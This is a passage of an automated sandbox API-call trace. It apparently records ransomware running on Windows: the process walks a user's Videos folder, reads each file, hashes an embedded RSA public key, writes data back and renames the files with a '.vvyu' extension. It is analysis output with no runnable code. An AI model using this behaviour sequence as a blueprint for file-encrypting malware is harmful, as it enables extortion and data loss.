lpNewFilePointer=0x0) returned 1 [0196.412] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.413] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.414] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.414] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.414] CloseHandle (hObject=0x52c) returned 1 [0196.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d3a670 [0196.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.417] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\NNZzOSSfvX.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\nnzzossfvx.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\NNZzOSSfvX.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\nnzzossfvx.mp4.vvyu")) returned 1 [0196.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.420] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.423] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2ba87f0, ftCreationTime.dwHighDateTime=0x1d89c7d, ftLastAccessTime.dwLowDateTime=0xdcd8580, ftLastAccessTime.dwHighDateTime=0x1d8a153, ftLastWriteTime.dwLowDateTime=0xdcd8580, ftLastWriteTime.dwHighDateTime=0x1d8a153, nFileSizeHigh=0x0, nFileSizeLow=0xf96c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qPf-R5Z.mp4", cAlternateFileName="")) returned 1 [0196.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.423] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\qPf-R5Z.mp4") returned=".mp4" [0196.423] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\qPf-R5Z.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\qpf-r5z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.424] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=63852) returned 1 [0196.424] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.427] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xf946, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.427] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.429] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.429] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf96c, lpOverlapped=0x0) returned 1 [0196.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.430] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0196.431] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.431] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.431] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.431] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.431] GetLastError () returned 0x0 [0196.431] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.431] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0196.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.432] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.432] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.432] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf970) returned 0x2d4b778 [0196.432] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce90 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ced8 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.433] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a2a0 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.436] GetCurrentThreadId () returned 0x264 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d473b0 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.437] GetCurrentThreadId () returned 0x264 [0196.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.444] HeapFree (in: hHeap=0x6a0000, 